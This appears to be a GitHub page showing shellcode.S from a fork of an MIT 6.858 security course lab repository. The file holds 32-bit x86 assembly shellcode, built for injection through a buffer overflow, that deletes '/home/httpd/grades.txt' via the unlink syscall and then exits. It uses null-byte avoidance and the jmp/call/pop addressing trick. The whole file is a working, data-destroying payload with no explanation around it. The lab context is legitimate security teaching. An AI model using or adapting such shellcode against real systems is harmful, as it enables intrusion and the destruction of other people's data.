forked from yuyang-huang-90/mit-6.858-2014-lab
-
Notifications
You must be signed in to change notification settings - Fork 0
/
shellcode.S
35 lines (28 loc) · 893 Bytes
/
shellcode.S
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
#include <sys/syscall.h>
#define STRING "/home/httpd/grades.txt"
#define STRLEN 22
#define ARGV (STRLEN+1)
#define ENVP (ARGV+4)
.globl main
.type main, @function
main:
jmp calladdr
popladdr:
popl %esi
movl %esi,(ARGV)(%esi) /* set up argv pointer to pathname */
xorl %eax,%eax /* get a 32-bit zero value */
movb %al,(STRLEN)(%esi) /* null-terminate our string */
movl %eax,(ENVP)(%esi) /* set up null envp */
movb $SYS_unlink,%al /* syscall arg 1: syscall number */
movl %esi,%ebx /* syscall arg 2: string pathname */
leal ARGV(%esi),%ecx /* syscall arg 2: argv */
leal ENVP(%esi),%edx /* syscall arg 3: envp */
int $0x80 /* invoke syscall */
xorl %ebx,%ebx /* syscall arg 2: 0 */
movl %ebx,%eax
inc %eax /* syscall arg 1: SYS_exit (1), uses */
/* mov+inc to avoid null byte */
int $0x80 /* invoke syscall */
calladdr:
call popladdr
.ascii STRING